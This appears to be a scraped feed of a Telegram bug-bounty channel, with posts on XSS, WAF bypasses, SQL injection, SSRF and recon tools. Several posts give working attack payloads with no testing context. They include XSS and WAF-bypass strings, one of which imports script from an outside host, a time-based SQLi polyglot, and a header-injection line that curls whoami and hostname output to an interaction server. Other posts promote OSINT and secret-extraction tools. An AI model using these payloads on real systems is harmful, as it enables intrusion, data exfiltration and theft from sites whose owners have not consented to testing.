XSS in Office.com. The + made a difference.

Payload:‍‍‍

`'>+<script>alert()</script>`

#BugBounty #Tips #XSS
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

SubCerts

💬
SubCerts is an automated tool designed to extract subdomains from certificate transparency logs using the crt.sh API. This tool allows security researchers, penetration testers, and developers to identify subdomains of a target domain by leveraging publicly available certificates.

📊 Features:
⚪️ Subdomain Extraction: Utilizes crt.sh, a certificate transparency log search engine, to gather subdomains associated with a target domain.

⚪️ HTTP Probing: Automatically sends HTTP/HTTPS requests to each extracted subdomain using httpx and
returns:
⚫️ HTTP status codes
⚫️ Page titles
⚫️ Silent output for clean and organized results

⚪️ Automation: Run the tool with a simple command and get results efficiently without manual effort.

⚪️ Flexible Output: Optionally save the extracted subdomains and httpx results to a file for later review.

🔼 Installation:

cd SubCerts
chmod +x *.sh
./setup.sh
./subcerts.sh -h

💻 Usage:
To run SubCerts for a domain and save the results to a file:

./subcerts.sh -u example.com --output results.txt

😸 Github

⬇️ Download
🔒 BugCod3

#BugBounty #SubDomain #certificate
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

WAF bypass payloads

- Imperva/AWS
<details/open/id="&quot;"ontoggle=[JS]>

- Akamai
<details open id="' &quot;'"ontoggle=[JS]>``

#WAF #Bypass
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

XSS

Watch out for reflected XSS in the search parameter!

Payload:

"-->""/>Hack by Fagun</script><deTailS open x=">" ontoggle=(co\u006efirm)``>"

#XSS #BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Export to GBounty

💬
Export to GBounty is a Burp Suite extension developed using the Montoya API. It allows users to export selected HTTP requests from Burp Suite, including the Site Map Tree, Repeater, and Message Editor, into a compressed ZIP file. This ZIP file can be directly used with the GBounty scanner using the command ‍`gbounty -rf requests.zip`, enabling streamlined vulnerability scanning and management.

📊 Features:
⚪️ Effortless Export: Easily export selected HTTP requests from multiple sources within Burp Suite.
⚪️ Compressed Format: Saves requests in a ZIP archive, optimizing storage and transfer.
Unique File Naming: Each request is saved as a uniquely named text file within the ZIP to prevent conflicts.
⚪️ Wide Compatibility: Supports exporting from Site Map Tree, Repeater, Message Editor, and other compatible tools.
⚪️ User-Friendly Interface: Adds a context menu option "Export to GBounty" for a seamless user experience.
⚪️ Robust Error Handling: Provides clear notifications regarding the export status, including overwrite confirmations and error messages.

🔼 Installation:
Prerequisites
⚪️ Java Development Kit (JDK): Ensure you have JDK 8 or higher installed.
⚪️ Burp Suite: The extension is compatible with Burp Suite Professional and Burp Suite Community.

💻 Usage:
Select Requests to Export:

Within Burp Suite, select the HTTP requests you wish to export from the Site Map Tree, Repeater, Message Editor, or other supported tools.

📂 Export Requests:
Right-click on the selected requests. Choose the Export to GBounty option from the context menu.

📂 Run GBounty Scanner:
Use the exported ZIP file with the GBounty scanner by executing the following command in your terminal:

gbounty -rf requests.zip

😸 Github

⬇️ Download
🔒 BugCod3

#BugBounty #Tips #GBounty
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

XٓSS

Bypass #Akamai, #Imperva and #CloudFlare WAF 🧱🔥

<A HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)>

#BugBounty #Tips #Bypass
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Time based SQLi Payload 💣

if(now()=sysdate(),sleep(10),0)/*'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0))OR"*/

Injection Points 💉
URI
parameter name (before & after)
parameter value (before & after)
HTTP Headers like User-Agent,etc...

#SQLi #Payload
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

HACKER search engines

#BugBounty #Search #Engines #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Hacking Articles- Cyber Security Mindmap

💬
This repository will contain many mindmaps for cyber security technologies, methodologies, courses, and certifications in a tree structure to give brief details about them

😸 Github

#Cyber #Security #Mindmap
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

RCE - Can we still use this in HTTP Header?

`
'
;
$
>

curl${IFS}$(whoami)-$(hostname)-$(hostname${IFS}-i)[.]your-interact-server

#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

JSNinja - "Hunting Bugs in JavaScript!"

💬
JSNinja is a powerful tool for extracting URLs and sensitive information from JavaScript files. It's designed for security enthusiasts,BugHunters and developers.

📊 Features:
➕ Extract URLs from JavaScript files!
➕ Identify sensitive information such as API keys and tokens!
➕ User-friendly interface!
➕Open Source and actively maintained!

🔼 Installation:

sudo apt update
sudo apt install git python3 python3-pip -y
cd JSNinja
pip3 install -r requirements.txt

💻 Usage:

python3 jsninja.py -u http://example.com/script.js --secrets --urls

Command-Line Options:
⚪️ -u or --url: Specify a single JavaScript URL to fetch.
⚪️ --secrets: Look for sensitive information in the JavaScript content.
⚪️ --urls: Extract URLs from the JavaScript content.
⚪️ -o or --output_file: Specify the file to save extracted links (default: extracted_links.txt).

😸 Github

⬇️ Download
🔒 BugCod3

#BugBounty #JS #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Top 25 server-side request forgery (SSRF) parameters

Here are the top 25 parameters that could be vulnerable to server-side request forgery (SSRF) vulnerability:

?dest={target}
?redirect={target}
?uri={target}
?path={target}
?continue={target}
?url={target}
?window={target}
?next={target}
?data={target}
?reference={target}
?site={target}
?html={target}
?val={target}
?validate={target}
?domain={target}
?callback={target}
?return={target}
?page={target}
?feed={target}
?host={target}
?port={target}
?to={target}
?out={target}
?view={target}
?dir={target}

Next time you encounter such parameters in an URL, get notice because SSRF is a critical vulnerability that may allow you to:

⚪️ Access services on the loopback interface of the remote server
⚪️ Scan internal network an potentially interact with internal services
⚪️ Read local files on the server using file:// protocol handler
⚪️ Move laterally / pivoting into the internal environment

#SSRF #BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

CloudFlare XSS Bypass!

OnXSS=<Img/Src/OnError=alert(1)>

It's better than our previous <Img Src=OnXSS OnError=alert(1)> because it works where no spaces are allowed.

#XSS #Bypass
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🦅 Blackbird 🦅

💬
Blackbird is a robust OSINT tool that facilitates rapid searches for user accounts by username or email across a wide array of platforms, enhancing digital investigations. It features WhatsMyName integration, export options in PDF, CSV, and HTTP response formats, and customizable search filters.

🔼 Installation:

cd blackbird
pip install -r requirements.txt

💻 Usage:
Search by username 👤
python blackbird.py --username username1 username2 username3

Search by email 🌐
python blackbird.py --email email1@email.com email2@email.com email3@email.com

Export results to PDF 📂
python blackbird.py --email email1@email.com --pdf

✨ AI:
Blackbird uses AI-powered NER models to improve metadata extraction, identifying key entities for faster and more accurate insights.
python blackbird.py --username username1 --ai

😸 Github

⬇️ Download
🔒 BugCod3

#Python #Osint #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

javascript How to extract urls,srcs and hrefs from all HTML elements in any website? Open DevTools and run

urls = []
$$('*').forEach(element => {
  urls.push(element.src)
  urls.push(element.href)
  urls.push(element.url)
}); console.log(...new Set(urls))

#js #extract #urls
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

┌──(BugCod3㉿kali)-[~]
└─$ sudo rm -rf *2024

┌──(BugCod3㉿kali)-[~]
└─$ sudo mkdir 2025

#Notification #NewYear
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

CVE-2024-55591

A Fortinet FortiOS Authentication Bypass Vulnerable Behaviour Detection

💬
Description:
This script attempts to create a WebSocket connection at a random URI from a pre-authenticated perspective to the FortiOS management interface, and reviews the response to determine if the instance is vulnerable

Affected Versions:
⚪️ FortiOS 7.0.0 through 7.0.16
⚪️ FortiProxy 7.0.0 through 7.0.19
⚪️ FortiProxy 7.2.0 through 7.2.12

😸 Github

⬇️ Download
🔒 BugCod3

#Python #CVE #Vulnerable #Detection
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

HExHTTP

💬
HExHTTP is a tool designed to perform tests on HTTP headers and analyze the results to identify vulnerabilities and interesting behaviors.

📊 Features:
⚪️ Server Error response checking
⚪️ Localhost header response analysis
⚪️ Vhosts checking
⚪️ Methods response analysis
⚪️ HTTP Version analysis [Experimental]
⚪️ Cache Poisoning DoS (CPDoS) techniques
⚪️ Web cache poisoning
⚪️ Range poisoning/error (416 response error) [Experimental]
⚪️ Cookie Reflection
⚪️ CDN/proxies Analysis (Envoy/Apache/Akamai/Nginx) [IP]

🔼 Installation:

pip install -r requirements.txt
./hexhttp.py -u 'https://target.tld/'
# OR
python3 hexhttp.py -u 'https://target.tld/'

💻 Usage:

./hexhttp.py -h
# Usage: hexhttp.py [-h] [-u URL] [-f URL_FILE] [-H CUSTOM_HEADER] [-A USER_AGENT] [-F] [-a AUTH] [-b]

😸 Github

⬇️ Download
🔒 BugCod3

#Python #HTTP #Headers #Analyze
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3